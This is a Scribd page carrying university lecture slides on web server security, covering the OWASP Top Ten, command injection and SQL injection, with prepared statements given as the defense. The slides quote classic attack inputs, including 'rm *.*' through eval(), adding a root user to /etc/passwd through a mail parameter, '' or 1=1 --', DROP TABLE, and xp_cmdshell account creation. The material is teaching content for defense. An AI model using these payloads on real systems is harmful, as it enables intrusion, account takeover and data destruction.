0% found this document useful (0 votes)

79 views

Lecture 6: Modules 6.1-6.10 Web Server Security CSE 628/628A

The document discusses three major web server security vulnerabilities: SQL injection, cross-site request forgery (CSRF), and cross-site scripting (XSS). It provides examples of SQL injection attacks where malicious SQL code is inserted through user inputs to alter the meaning of SQL queries. It also explains how CSRF attacks work by tricking a victim's browser to generate requests to a vulnerable web application using the victim's credentials. Finally, it briefly introduces XSS attacks where malicious scripts are injected into a vulnerable web page that are then executed by a victim's browser.

Uploaded by

Harpreet Singh

Available Formats

Download as PPTX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

79 views

Lecture 6: Modules 6.1-6.10 Web Server Security CSE 628/628A

Uploaded by

Harpreet Singh

Available Formats

Download as PPTX, PDF, TXT or read online on Scribd

You are on page 1/ 23

Lecture 6: Modules 6.1-6.

10
Web Server Security
CSE 628/628A
Sandeep K. Shukla
Indian Institute of Technology
Kanpur
Acknowledgements
Dan Boneh (Stanford University)
John C. Mitchell (Stanford University)
Nicolai Zeldovich (MIT)
Jungmin Park (Virginia Tech)
Patrick Schaumont (Virginia Tech)
C. Edward Chow
Arun Hodigere
Web Resources
Lecture 6: Web Server
Security
Total 6 Modules on Web Client Security
Module 6.1: Major Web server Threats:
Command and SQL Injection Attacks
Module 6.2: CSRF Cross-Site Request
Forgery
Module 6.3: XSS Cross-Site Scripting
Module 6.4: Defenses and Protections
against XSS
Module 6.5: Finding Vulnerabilities
Module 6.6: Secure Development
Module 6.1: Major Web
Server Threats
Command and SQL Injection
OWASP Top Ten (2013)

A- Injection Untrusted data is sent to an interpreter

1 as part of a command or query.
A- Authentication Attacks passwords, keys, or session
2 and Session tokens, or exploit other implementation
Management flaws to assume other users identities.
A- Cross-site An application takes untrusted data and
3 scripting sends it to a web browser without proper
validation or escaping
Various expose a file, directory, or database
implementation key without access control check,
problems misconfiguration, missing function-level
access control
A- Cross-site A logged-on victims browser sends a
8 request forgery forged HTTP request, including the
victims session cookie and other
https://www.owasp.org/index.php/Top_10_2013-Top_10
authentication information
Three vulnerabilities we will discuss

SQL Injection
Browser sends malicious input to server
Bad input checking leads to malicious SQL query
CSRF Cross-site request forgery
Bad web site sends browser request to good web
site, using credentials of an innocent victim
XSS Cross-site scripting
Bad web site sends innocent victim a script that
steals information from an honest web site
Three vulnerabilities we will discuss

SQL Injection
Uses malicious
Browser sends SQL to change meaning
input of
to server
database command
Bad input checking leads to malicious SQL query
CSRF Cross-site request forgery
Bad web site Leverage users session at
sendsvictim
request to good web site,
server
using credentials of an innocent victim who
visits site
XSS Cross-site scripting
Inject malicious script into
trusted context
Bad web site sends innocent victim a script that
steals information from an honest web site
Command Injection

Background for SQL Injection

General code injection
attacks
Attack goal: execute arbitrary code on the server
Example
code injection based on eval (PHP)
http://site.com/calc.php (server side calculator)

$in = $_GET[exp'];
eval('$ans = ' . $in . ';');

Attack
http://site.com/calc.php?exp= 10 ; system(rm *.*)

(URL encoded)
Code injection using
system()
Example: PHP server-side code for sending email
$email = $_POST[email]
$subject = $_POST[subject]
system(mail $email s $subject < /tmp/joinmynetwork)

Attacker can post

http://yourdomain.com/mail.php?
email=hacker@hackerhome.net &
subject=foo < /usr/passwd; ls

OR
http://yourdomain.com/mail.php?
email=hacker@hackerhome.net&subject=foo;
echo evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
SQL Injection
Database queries with PHP
(the wrong way)

Sample PHP

$recipient = $_POST[recipient];
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);

Problem
What if recipient is malicious string that
changes the meaning of the query?
Basic picture: SQL Injection
Victim Server

u s form
i o
malic
1 post

2
unintended
3 receive valuable SQL query
Attacker data

Victim SQL DB
13
CardSystems Attack
CardSystems
credit card payment processing
company
SQL injection attack in June 2005
put out of business

The Attack
263,000 credit cards stolen from
database
credit card #s stored unencrypted
43 million credit card #s exposed
14
http://www.cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpress.html
Example: buggy login page
(ASP)

set ok = execute( "SELECT * FROM Users

WHERE user=' " & form(user) & " '

AND pwd=' " & form(pwd) & ' );

if not ok.EOF
login success
else fail;

Is this exploitable?
16
Enter
Username SELECT *
& FROM Users
Web Password Web WHERE user='me'
Browser
Server
DB
(Client) AND pwd='1234'

Normal Query
Bad input
Suppose user = ' or 1=1 -- (URL
encoded)

Then scripts does:

ok = execute( SELECT
WHERE user= ' ' or 1=1 -- )
The -- causes rest of line to be ignored.
Now ok.EOF is always false and login
succeeds.

The bad news: easy login to many sites

this way.
18
Even worse
Suppose user =
; DROP TABLE Users --

Then script does:

ok = execute( SELECT
WHERE user= ; DROP TABLE Users )

Deletes user table

Similarly: attacker can add users, reset pwds,
19 etc.
Even worse
Suppose user =
; exec cmdshell
net user badguy badpwd / ADD --

Then script does:

ok = execute( SELECT
WHERE username= ; exec )

If SQL server context runs as sa,

20
attacker gets account on DB server
Lets see how the attack described in this cartoon works

21
Preventing SQL Injection

Never build SQL commands yourself !

Use parameterized/prepared SQL

Use ORM framework

Parameterized/prepared

SQL
Builds SQL queries by properly escaping args: \

Example: Parameterized SQL: (ASP.NET 1.1)

Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(

"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[user] );
cmd.Parameters.Add("@Pwd", Request[pwd] );
cmd.ExecuteReader();

In PHP: bound parameters -- similar function

Term Sheet - Symita Inc
100% (1)
Term Sheet - Symita Inc
4 pages
Security+ Slides
100% (1)
Security+ Slides
251 pages
Declaration of Conformity
No ratings yet
Declaration of Conformity
10 pages
SQL Injection
No ratings yet
SQL Injection
32 pages
Damn Vulnerable Web Applications
No ratings yet
Damn Vulnerable Web Applications
24 pages
Manual SQL Injection Using DVWA
100% (1)
Manual SQL Injection Using DVWA
16 pages
SQL Injection
No ratings yet
SQL Injection
41 pages
09-web-site-sec
No ratings yet
09-web-site-sec
98 pages
Web Application Security: John Mitchell
No ratings yet
Web Application Security: John Mitchell
90 pages
21-websafety2
No ratings yet
21-websafety2
11 pages
Secure Coding Lecture 2: Injections, and Buffer Overflows: Benny Pinkas
No ratings yet
Secure Coding Lecture 2: Injections, and Buffer Overflows: Benny Pinkas
75 pages
08 Week8 10 Web Security B
No ratings yet
08 Week8 10 Web Security B
33 pages
Chapt5 OWASP SQL XSS EH
No ratings yet
Chapt5 OWASP SQL XSS EH
29 pages
Web Tutor
No ratings yet
Web Tutor
17 pages
Application Vulnerabilities and Defences
No ratings yet
Application Vulnerabilities and Defences
12 pages
Ak Cyber Next5
No ratings yet
Ak Cyber Next5
23 pages
Session 1 Web Application Security
No ratings yet
Session 1 Web Application Security
83 pages
Advanced Web Hacking PDF
100% (1)
Advanced Web Hacking PDF
21 pages
SQL Injection Attack Lab (TASK-4) Sai Ram
No ratings yet
SQL Injection Attack Lab (TASK-4) Sai Ram
8 pages
Comprehensive New Https PHP
No ratings yet
Comprehensive New Https PHP
19 pages
Master Semminar Injection Exploits
No ratings yet
Master Semminar Injection Exploits
24 pages
DEF CON 23 - Lance-Buttars-Nemus-Hacking-SQL-Injection-for-Remote-Code-Execution-on-a-LAMP-UPDATED
No ratings yet
DEF CON 23 - Lance-Buttars-Nemus-Hacking-SQL-Injection-for-Remote-Code-Execution-on-a-LAMP-UPDATED
96 pages
Code Injection
No ratings yet
Code Injection
11 pages
Secure Programming in PHP by Akash Mahajan
No ratings yet
Secure Programming in PHP by Akash Mahajan
13 pages
Ak Cyber Next5
No ratings yet
Ak Cyber Next5
23 pages
Chapter 7 Application Vulnerabilities
No ratings yet
Chapter 7 Application Vulnerabilities
73 pages
Lec3-WebAttacks DefensesContd
No ratings yet
Lec3-WebAttacks DefensesContd
57 pages
Cybersecurity 11 Feb (part 1)
No ratings yet
Cybersecurity 11 Feb (part 1)
25 pages
OWASP Top 10
No ratings yet
OWASP Top 10
31 pages
Tracking Down App Security
No ratings yet
Tracking Down App Security
69 pages
10.Web Application Security-SQL Injection
No ratings yet
10.Web Application Security-SQL Injection
42 pages
DenverApril2012Meeting-WebGoat & WebScarab
No ratings yet
DenverApril2012Meeting-WebGoat & WebScarab
33 pages
Sqli Attacks
No ratings yet
Sqli Attacks
149 pages
Chapter-3 Web Security
No ratings yet
Chapter-3 Web Security
71 pages
Week 3 - SQL Injection
No ratings yet
Week 3 - SQL Injection
17 pages
Web Security 2
No ratings yet
Web Security 2
33 pages
09-15-16 GreyHat SQL Injection
No ratings yet
09-15-16 GreyHat SQL Injection
25 pages
LESSON 7-SQL Injection
No ratings yet
LESSON 7-SQL Injection
15 pages
Another: Javascript
No ratings yet
Another: Javascript
9 pages
What Is SQL Injection in PHP Security?
No ratings yet
What Is SQL Injection in PHP Security?
3 pages
Cyberattack Methods 1
No ratings yet
Cyberattack Methods 1
20 pages
Lecture 8 Database Security
No ratings yet
Lecture 8 Database Security
34 pages
DAST - Checklist (2) 5
No ratings yet
DAST - Checklist (2) 5
10 pages
Web Application Security: Vulnerabilities, Attacks, and Countermeasures
No ratings yet
Web Application Security: Vulnerabilities, Attacks, and Countermeasures
72 pages
Input Validation Vulnerabilities
No ratings yet
Input Validation Vulnerabilities
18 pages
Web Security
No ratings yet
Web Security
30 pages
Avoidance Techniques: by Pdo by Mysqli
No ratings yet
Avoidance Techniques: by Pdo by Mysqli
2 pages
Chapter 8- Web Security
No ratings yet
Chapter 8- Web Security
123 pages
CyberSecurity
No ratings yet
CyberSecurity
11 pages
CEH Lesson 5 - Web Server Hacking
No ratings yet
CEH Lesson 5 - Web Server Hacking
25 pages
Web Application Security
No ratings yet
Web Application Security
181 pages
Ethical Hacking v10: Module 13 - SQL Injection
0% (1)
Ethical Hacking v10: Module 13 - SQL Injection
43 pages
Vulnerability Playbook
No ratings yet
Vulnerability Playbook
14 pages
SQL Injection
No ratings yet
SQL Injection
4 pages
15. SQL Injection
No ratings yet
15. SQL Injection
22 pages
Web Security Threats
No ratings yet
Web Security Threats
22 pages
In This Series
No ratings yet
In This Series
11 pages
Cyber Security - Lecture 3
No ratings yet
Cyber Security - Lecture 3
15 pages
OWASP Web and Mobile App Security
No ratings yet
OWASP Web and Mobile App Security
101 pages
Info2180 Lecture 8
No ratings yet
Info2180 Lecture 8
44 pages
Cyberattack Methods
No ratings yet
Cyberattack Methods
19 pages
Sql Injection Best Method for Begineers
From Everand
Sql Injection Best Method for Begineers
Kishor Sarkar X
No ratings yet
Some Tutorials in Computer Networking Hacking
From Everand
Some Tutorials in Computer Networking Hacking
Dr. Hidaia Mahmood Alassouli
No ratings yet
Module-3 2
No ratings yet
Module-3 2
9 pages
Systems and Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
No ratings yet
Systems and Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
7 pages
Introduction To Browser Isolation
No ratings yet
Introduction To Browser Isolation
11 pages
Module-0 5
No ratings yet
Module-0 5
12 pages
Module-0 2
No ratings yet
Module-0 2
8 pages
Module-0 3
No ratings yet
Module-0 3
6 pages
Defense Against Control Hijacking - Platform Defenses
No ratings yet
Defense Against Control Hijacking - Platform Defenses
8 pages
Module-2 3
No ratings yet
Module-2 3
28 pages
Module-1 1
No ratings yet
Module-1 1
23 pages
Advanced Control Hijacking Attacks
No ratings yet
Advanced Control Hijacking Attacks
13 pages
More Control Hijacking Attacks: Format String Vulnerabilities
No ratings yet
More Control Hijacking Attacks: Format String Vulnerabilities
8 pages
Other Issues in Access Control
No ratings yet
Other Issues in Access Control
17 pages
Module-2 1
No ratings yet
Module-2 1
10 pages
Unix and Windows Access Control
No ratings yet
Unix and Windows Access Control
18 pages
Module-4.2 0
No ratings yet
Module-4.2 0
15 pages
Module 5.3: HTTP & Content Rendering
No ratings yet
Module 5.3: HTTP & Content Rendering
23 pages
Lecture 5: Modules 5.1-5.6 Web Client Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
No ratings yet
Lecture 5: Modules 5.1-5.6 Web Client Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
11 pages
Module 5.2: Web Security Definitions, Goals and Threat Models
No ratings yet
Module 5.2: Web Security Definitions, Goals and Threat Models
10 pages
Defenses and Protections Against XSS
No ratings yet
Defenses and Protections Against XSS
13 pages
Module 5.6: Cookies, Frames and Frame Busting
No ratings yet
Module 5.6: Cookies, Frames and Frame Busting
13 pages
Module 5.4: Browser Isolation
No ratings yet
Module 5.4: Browser Isolation
21 pages
Module6 3
No ratings yet
Module6 3
17 pages
Module 5.5: Security User Interface
No ratings yet
Module 5.5: Security User Interface
11 pages
Module6 5
No ratings yet
Module6 5
6 pages
Email Security, Certificates
No ratings yet
Email Security, Certificates
12 pages
Module7 7
No ratings yet
Module7 7
5 pages
Lecture 7: Modules 7.1-7.10 Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
No ratings yet
Lecture 7: Modules 7.1-7.10 Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
12 pages
Lecture 7: Modules 7.1-7.10 Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
No ratings yet
Lecture 7: Modules 7.1-7.10 Network Security CSE 628/628A: Sandeep K. Shukla Indian Institute of Technology Kanpur
17 pages
Module7 6
No ratings yet
Module7 6
8 pages
Digital Signature, Hash Functions
No ratings yet
Digital Signature, Hash Functions
9 pages
CNS Unit 4
No ratings yet
CNS Unit 4
11 pages
Chapter 4 Security Design
No ratings yet
Chapter 4 Security Design
50 pages
Information Security Quick Reference Guide: L1 L2 L3 L4 L5
No ratings yet
Information Security Quick Reference Guide: L1 L2 L3 L4 L5
2 pages
A Comprehensive Overview of Secure Cloud Computing: January 29, 2016
No ratings yet
A Comprehensive Overview of Secure Cloud Computing: January 29, 2016
54 pages
SQL Synopsis
No ratings yet
SQL Synopsis
8 pages
CISSP Cheat Sheet Domain 5-3 PDF
No ratings yet
CISSP Cheat Sheet Domain 5-3 PDF
1 page
DP Self Made Checklist
No ratings yet
DP Self Made Checklist
10 pages
SSO Between SAP Enterprise Portals To BO & SAP BO To BW SSO Configuration Document - SAP Blogs
No ratings yet
SSO Between SAP Enterprise Portals To BO & SAP BO To BW SSO Configuration Document - SAP Blogs
16 pages
Claves Nod32 3 4 5
No ratings yet
Claves Nod32 3 4 5
10 pages
IBM Security Products
No ratings yet
IBM Security Products
1 page
IPR Unit 5
No ratings yet
IPR Unit 5
25 pages
Cloud Computing Unit-2
No ratings yet
Cloud Computing Unit-2
12 pages
Eset
No ratings yet
Eset
7 pages
Symmetric and Asymmetric Encryption
100% (1)
Symmetric and Asymmetric Encryption
14 pages
Nt2580 Project 1 Multi Layered Security Plan
No ratings yet
Nt2580 Project 1 Multi Layered Security Plan
3 pages
Comelec Voters
No ratings yet
Comelec Voters
459 pages
Crypto Cheat Sheet-Technical Bulletin-En PDF
No ratings yet
Crypto Cheat Sheet-Technical Bulletin-En PDF
12 pages
Cloud Controls Matrix v3 0 1
No ratings yet
Cloud Controls Matrix v3 0 1
1,304 pages
Certified List of Candidates: Basilan - City of Lamitan Basilan - City of Lamitan
No ratings yet
Certified List of Candidates: Basilan - City of Lamitan Basilan - City of Lamitan
3 pages
Guidelines To Download Allotment Order For Faculty
No ratings yet
Guidelines To Download Allotment Order For Faculty
4 pages
TOPIC 3 - Infomtion Assets Seccurity and Risk Presentation Updated
No ratings yet
TOPIC 3 - Infomtion Assets Seccurity and Risk Presentation Updated
49 pages
802.1x Cisco ISE Succeed Steps
No ratings yet
802.1x Cisco ISE Succeed Steps
3 pages
Iso27001 Using ISO Using ISO 27001 For PCI DSS Compliance
No ratings yet
Iso27001 Using ISO Using ISO 27001 For PCI DSS Compliance
6 pages
DIGISOL Wireless Router Settings
No ratings yet
DIGISOL Wireless Router Settings
2 pages
3 Jam Up 772 02.04.20
No ratings yet
3 Jam Up 772 02.04.20
2 pages
Claves Eset 5
No ratings yet
Claves Eset 5
3 pages
Shukla Zomato Data Breach
No ratings yet
Shukla Zomato Data Breach
11 pages